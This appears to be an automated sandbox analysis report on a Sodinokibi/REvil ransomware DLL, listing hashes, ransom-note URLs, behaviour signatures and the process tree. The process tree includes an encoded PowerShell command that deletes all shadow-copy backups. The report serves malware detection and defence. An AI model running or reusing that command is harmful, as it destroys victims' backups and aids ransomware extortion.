Analysis
-
max time kernel
142s -
max time network
104s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
03-05-2024 03:22
Static task
static1
Behavioral task
behavioral1
Sample
0f8ee1ed415794ec053dca928a409436_JaffaCakes118.dll
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
0f8ee1ed415794ec053dca928a409436_JaffaCakes118.dll
Resource
win10v2004-20240419-en
General
-
Target
0f8ee1ed415794ec053dca928a409436_JaffaCakes118.dll
-
Size
166KB
-
MD5
0f8ee1ed415794ec053dca928a409436
-
SHA1
816810ed34af4cb460c36b76b6dc614be05b4d99
-
SHA256
6f6d4f3090669a12b7870d959302181d721436520374a4115e6c7bcfbc21cfef
-
SHA512
4ad3f0bdaf1121612b102e871ae12562fe765d00e3ab3cc77ee773c78a09cc8c9ebfeaabb15dde38a2df2f73be2338b93028d95ca003bd39556f1190f6108727
-
SSDEEP
3072:JLFrb30BRtBZZg+i2ayyYOCWGPyLydrkxMT3Q42wWIF:NJ0BXScFyfC3Hd4yg42RI
Malware Config
Extracted
C:\Users\3s1jx5-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/21C40BD2B3D60417
http://decryptor.cc/21C40BD2B3D60417
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\D: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\F: rundll32.exe -
Drops file in Program Files directory 18 IoCs
description ioc Process File opened for modification \??\c:\program files\ConnectPublish.potx rundll32.exe File opened for modification \??\c:\program files\PublishProtect.snd rundll32.exe File opened for modification \??\c:\program files\RestartRedo.eprtx rundll32.exe File opened for modification \??\c:\program files\TraceGrant.pdf rundll32.exe File opened for modification \??\c:\program files\UnprotectSubmit.wma rundll32.exe File created \??\c:\program files (x86)\3s1jx5-readme.txt rundll32.exe File opened for modification \??\c:\program files\MoveImport.dxf rundll32.exe File opened for modification \??\c:\program files\RevokePush.m3u rundll32.exe File opened for modification \??\c:\program files\UnprotectStep.au3 rundll32.exe File opened for modification \??\c:\program files\AssertBlock.ADTS rundll32.exe File opened for modification \??\c:\program files\BackupDebug.easmx rundll32.exe File opened for modification \??\c:\program files\ConvertFromTrace.ps1xml rundll32.exe File opened for modification \??\c:\program files\MergeRepair.wma rundll32.exe File created \??\c:\program files\3s1jx5-readme.txt rundll32.exe File opened for modification \??\c:\program files\AssertHide.rar rundll32.exe File opened for modification \??\c:\program files\CopyCompress.odt rundll32.exe File opened for modification \??\c:\program files\InvokeUndo.rtf rundll32.exe File opened for modification \??\c:\program files\RemoveSelect.zip rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1480 rundll32.exe 1480 rundll32.exe 2452 powershell.exe 2452 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1480 rundll32.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeBackupPrivilege 3124 vssvc.exe Token: SeRestorePrivilege 3124 vssvc.exe Token: SeAuditPrivilege 3124 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 1248 wrote to memory of 1480 1248 rundll32.exe 85 PID 1248 wrote to memory of 1480 1248 rundll32.exe 85 PID 1248 wrote to memory of 1480 1248 rundll32.exe 85 PID 1480 wrote to memory of 2452 1480 rundll32.exe 89 PID 1480 wrote to memory of 2452 1480 rundll32.exe 89 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\0f8ee1ed415794ec053dca928a409436_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\0f8ee1ed415794ec053dca928a409436_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1612
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3124
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD5eecedbb6cb61521db278de93d5977c8b
SHA10492a87154b76db16b37b59dd37a6a9a1775f6f4
SHA2561b6ed0ade407bce21eda5cef98d6a887f2bcf113d839727405e835c51e4938a3
SHA5121157cbe2c931ba65ab55a4f0c312992c9ff538b742e3f76f1fab1958b5f87f6846f91ae62a7d43e41cbd68fa129a9adddacae4e2668fad9575c39e0d4cf3c419
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82